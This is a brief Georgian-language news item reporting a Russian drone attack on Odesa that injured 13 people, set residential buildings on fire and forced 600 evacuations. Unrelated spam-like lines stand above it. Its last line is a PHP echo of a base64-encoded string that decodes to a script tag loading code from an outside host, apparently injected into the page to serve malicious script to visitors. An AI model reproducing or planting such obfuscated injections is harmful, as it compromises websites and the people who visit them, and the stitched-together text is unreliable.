global distribution
გარე ავეჯი

რუსებმა უკრაინის ქალაქ ოდესას დრონებით შეუტიეს, რომლის დროსაც 10 დარტყმა განხორციელდა, რამაც ხანძარი გამოიწვია, - ინფორმაციას უკრაინული მედია ქვეყნის საგანგებო სიტუაციების სამინისტროზე დაყრდნობით ავრცელებს.

მათივე ინფორმაციით, დაშავდა 13 ადამიანი, მათ შორის 3 მაშველი.

მაშველების განცხადებით, ოთხსართულიანი საცხოვრებელი შენობა მთლიანად ცეცხლის ალშია გახვეული.

საგანგებო სიტუაციების სამსახური ცნობით, დაზიანდა 23-სართულიანი საცხოვრებელი შენობა, სადაც ხანძარმა მე-18, მე-19 და მე-20 სართულები მოიცვა. მრავალსართულიანი შენობიდან 600 ადამიანის ევაკუაცია განხორციელდა.

ხანძარმა ასევე გაანადგურა 5 საცხოვრებელი შენობა და 3 ავტომობილი.

151
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");